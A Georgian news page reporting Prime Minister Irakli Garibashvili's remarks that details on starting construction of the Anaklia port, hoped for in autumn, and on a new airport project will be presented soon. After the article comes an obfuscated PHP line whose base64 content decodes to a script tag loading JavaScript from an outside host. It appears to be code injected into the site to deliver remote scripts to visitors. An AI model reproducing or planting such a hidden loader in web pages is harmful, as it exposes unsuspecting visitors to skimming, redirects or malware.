celsiusi
ავერსი საქკაბელი

ძალიან მალე ჩვენ გამოვიტანთ უკვე უფრო დეტალურ ინფორმაციას იმის თაობაზე, როდის დავიწყებთ კონკრეტულად ანაკლიის პორტის მშენებლობას, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა მთავრობის სხდომაზე განაცხადა.

ამასთან, ღარიბაშვილმა ასევე ისაუბრა ახალი აეროპორტის პროექტზე.

„ეკონომიკის სამინისტრო მუშაობს, ძალიან მალე ჩვენ გამოვიტანთ უკვე უფრო დეტალურ ინფორმაციას იმის თაობაზე, როდის დავიწყებთ კონკრეტულად ანაკლიის პორტის მშენებლობას, რომელიც, გვინდა, რომ დავიწყოთ შემოდგომაზე.

ასევე, ახალი აეროპორტის პროექტის თაობაზე ძალიან მალე გვექნება პრეზენტაცია. ამის შესახებ ძალიან მალე მოგახსენებთ. ეს არის მრავალ ასეულმილიონიანი ინვესტიცია. რაც შეეხება ენერგეტიკის ობიექტებს, აქაც ძალიან სერიოზული წინსვლა გვაქვს და ძალიან მალე განახლებულ ინფორმაციებს წარმოგიდგენთ“, – განაცხადა პრემიერმა.

333
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");